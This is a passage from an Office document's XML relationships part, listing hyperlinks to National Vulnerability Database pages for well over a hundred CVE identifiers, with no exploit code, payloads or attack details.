Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80166" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84497" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84505" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84506" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84511" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84515" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84575" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84607" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85892" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88051" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88052" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88053" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89161" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89789" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89791" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89793" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89799" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89801" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89803" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89805" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89808" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89810" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89814" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89815" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89819" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89823" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89825" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89829" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89832" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89836" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89841" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89854" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89870" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89873" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89875" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89880" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89882" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89883" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89887" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89888" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89890" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89893" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89894" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89899" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89902" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89903" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89906" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89919" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89920" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89922" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89938" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89940" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89941" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89942" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89961" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89965" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89967" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89979" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89985" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89986" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89988" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89994" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89997" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89998" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90001" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90002" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90003" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90007" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90008" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90009" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90010" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90013" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90014" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90022" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90026" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90027" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90030" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90032" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90043" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90044" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90045" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90046" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90047" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90947" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90948" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90949" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92786" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92816" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14916" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14917" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16432" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20342" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29811" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31278" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61595" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62997" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73439" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73496" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81210" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85385" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86474" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86585" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87084" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87996" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89060" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90025" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76425" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79639" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85197" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92465" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92616" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92779" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14871" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-1168" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13260" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15955" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17615" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18212" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19290" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19534" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19666" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19667" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20247" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20343" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27557" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28935" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28938" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33963" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43789" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45759" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45765" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45766" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45768" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45769" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45770" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46352" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49362" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49363" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53752" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54567" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57119" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63126" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63128" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64761" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65342" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65378" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65410" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67211" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 